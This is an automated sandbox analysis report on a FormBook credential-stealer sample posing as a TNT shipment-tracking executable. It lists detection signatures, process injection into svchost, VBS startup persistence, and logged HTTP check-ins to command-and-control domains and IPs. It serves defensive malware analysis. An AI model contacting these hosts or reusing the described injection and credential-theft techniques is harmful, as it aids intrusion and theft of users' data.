Edit tour

Windows Analysis Report
TNT AWB TRACKING DETAILS.exe

Overview

General Information

Sample name:	TNT AWB TRACKING DETAILS.exe
Analysis ID:	1575706
MD5:	bc31759ceac4e0f680e1d6462953979b
SHA1:	4f31fa901bbcb19aa891b870a6920746fa9c59da
SHA256:	ca8a10690ababb663b41f399da42e43ad77fc59310862b369e4e38e9df00f0e0
Tags:	exeFormbookuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

TNT AWB TRACKING DETAILS.exe (PID: 5536 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: BC31759CEAC4E0F680E1D6462953979B)

jailkeeper.exe (PID: 1336 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: BC31759CEAC4E0F680E1D6462953979B)

svchost.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

RXSytTjWIT.exe (PID: 6280 cmdline: "C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

mobsync.exe (PID: 7700 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)

firefox.exe (PID: 3984 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

jailkeeper.exe (PID: 7420 cmdline: "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" MD5: BC31759CEAC4E0F680E1D6462953979B)

svchost.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.3439275115.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2801297101.0000000004750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2800761539.0000000003890000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3439303985.00000000041A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3436884138.0000000000310000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2800235122.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3439378043.00000000041F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2839997588.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
12.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , ProcessId: 7360, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ParentProcessId: 1336, ParentProcessName: jailkeeper.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 2404, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , ProcessId: 7360, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ParentProcessId: 1336, ParentProcessName: jailkeeper.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 2404, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ProcessId: 1336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T08:38:35.829132+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49900	3.33.130.190	80	TCP
2024-12-16T08:39:00.889862+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49959	3.33.130.190	80	TCP
2024-12-16T08:39:24.373516+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50015	8.217.17.192	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T08:38:52.725837+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49940	3.33.130.190	80	TCP
2024-12-16T08:38:55.387772+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49947	3.33.130.190	80	TCP
2024-12-16T08:38:58.241023+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49952	3.33.130.190	80	TCP
2024-12-16T08:39:16.150325+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49992	8.217.17.192	80	TCP
2024-12-16T08:39:18.931762+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49999	8.217.17.192	80	TCP
2024-12-16T08:39:21.707764+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50007	8.217.17.192	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.arcare.partners/0w45/?tB=FpalKbExj&f6Y4tfD=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: TNT AWB TRACKING DETAILS.exe	Virustotal: Detection: 39%			Perma Link
Source: TNT AWB TRACKING DETAILS.exe	ReversingLabs: Detection: 52%

Yara detected FormBook

Source: Yara match	File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3439275115.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2801297101.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800761539.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439303985.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3436884138.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800235122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439378043.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2839997588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TNT AWB TRACKING DETAILS.exe

Joe Sandbox ML: detected

Source: TNT AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000005.00000003.2768456836.0000000003231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768020271.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768357686.000000000321A000.00000004.00000020.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2884114394.00000000008F1000.00000004.00000001.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2740926346.00000000008DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RXSytTjWIT.exe, 0000000E.00000000.2713076461.000000000072E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: jailkeeper.exe, 00000004.00000003.2211714430.0000000003650000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000004.00000003.2209694261.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2692776523.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2690255416.0000000003500000.00000004.00000020.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2341869958.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2342252709.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2346293728.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2830902506.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2833018434.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2802851636.0000000004076000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.000000000456E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2805296168.0000000004220000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: jailkeeper.exe, 00000004.00000003.2211714430.0000000003650000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000004.00000003.2209694261.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000005.00000003.2692776523.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2690255416.0000000003500000.00000004.00000020.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2341869958.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2342252709.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2346293728.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2830902506.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2833018434.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2802851636.0000000004076000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.000000000456E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2805296168.0000000004220000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000005.00000003.2768456836.0000000003231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768020271.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768357686.000000000321A000.00000004.00000020.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2884114394.00000000008F1000.00000004.00000001.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2740926346.00000000008DB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B0445A
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0C6D1 FindFirstFileW,FindClose,	0_2_00B0C6D1
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B0C75C
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0EF95
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F0F2
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0F3F3
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B037EF
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03B12
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0BCBC
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028445A GetFileAttributesW,FindFirstFileW,FindClose,	4_2_0028445A
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028C6D1 FindFirstFileW,FindClose,	4_2_0028C6D1
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	4_2_0028C75C
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	4_2_0028EF95
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	4_2_0028F0F2
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	4_2_0028F3F3
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	4_2_002837EF
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00283B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	4_2_00283B12
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	4_2_0028BCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49959 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49900 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50015 -> 8.217.17.192:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 8.217.17.192:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49952 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49940 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49947 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 8.217.17.192:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 8.217.17.192:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.medicaresbasics.xyz

Source: Joe Sandbox View

IP Address: 3.33.130.190 3.33.130.190

Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B122EE

Source: global traffic	HTTP traffic detected: GET /0w45/?tB=FpalKbExj&f6Y4tfD=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8= HTTP/1.1Host: www.arcare.partnersAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Source: global traffic	HTTP traffic detected: GET /fm31/?f6Y4tfD=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&tB=FpalKbExj HTTP/1.1Host: www.medicaresbasics.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Source: global traffic	HTTP traffic detected: GET /ir1u/?f6Y4tfD=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX86+yEJ2aXOXj0apRFi4P0I8PrRUWlOvP3kyATHOLhpgDgxP6JOJQ=&tB=FpalKbExj HTTP/1.1Host: www.meliorahomes.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)

Source: global traffic	DNS traffic detected: DNS query: www.arcare.partners
Source: global traffic	DNS traffic detected: DNS query: www.medicaresbasics.xyz
Source: global traffic	DNS traffic detected: DNS query: www.resellnexa.shop
Source: global traffic	DNS traffic detected: DNS query: www.meliorahomes.net

Source: unknown

